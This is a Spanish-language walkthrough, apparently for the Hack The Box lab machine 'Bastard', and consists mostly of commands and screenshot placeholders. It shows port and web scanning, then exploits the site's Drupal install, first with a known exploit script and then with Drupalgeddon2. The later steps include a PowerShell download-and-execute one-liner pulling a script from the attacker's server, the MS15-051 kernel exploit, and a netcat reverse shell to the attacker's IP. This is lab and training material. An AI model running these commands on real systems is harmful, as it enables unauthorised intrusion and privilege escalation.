echo "10.129.149.237 bastard.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.149.237 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210511094802.png

nmap -sC -sV -O -p- -oA bastard 10.129.149.237

nmap -sU -O -p- -oA bastard-udp 10.129.149.237

nikto -h 10.129.149.237:80

gobuster dir -k -u http://bastard.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210511095149.png

Vemos que es un sitio en drupal


curl http://bastard.htb/CHANGELOG.txt

Pasted image 20210511095304.png

Bajamos el script 41564

Pasted image 20210511095532.png

Cambiamos las variables en el codigo

Pasted image 20210511095849.png

php 41564.php

Pasted image 20210511100006.png

Podemos ver la contrasena creada

Pasted image 20210511100225.png

Pasted image 20210511100924.png

Esto no me funciono a mi.

Entonces decidi usar Drupalgeddon2


git clone https://github.com/dreadlocked/Drupalgeddon2

Tambien tuve que instalar highline

sudo gem install highline


ruby drupalgeddon2.rb http://bastard.htb

Pasted image 20210511102101.png

Pasted image 20210511102127.png

No me funciono hacer el comando certutil

Entonces decidi usar InvokePowershell.ps1

Pasted image 20210511105840.png

python3 -m http.server 8888

drupalgeddon2>> powershell iex(new-object net.webclient).downloadstring('http://10.10.14.64:8888/InvokePowershell.ps1')

Pasted image 20210511105744.png

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051

Este seguro que nc64.exe y ms15-051x64.exe esten en el directorio donde ejecutarias el siguiente comando:

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd)

drupalgeddon2>> \\10.10.14.135\smbFolder\ms15-051x64.exe "\\10.10.14.135\smbFolder\nc64.exe -e cmd.exe 10.10.14.135 443")

![[Pasted image 20211223080756.png]]

boxes

copyright©2022 Cu3rv0x all rights reserved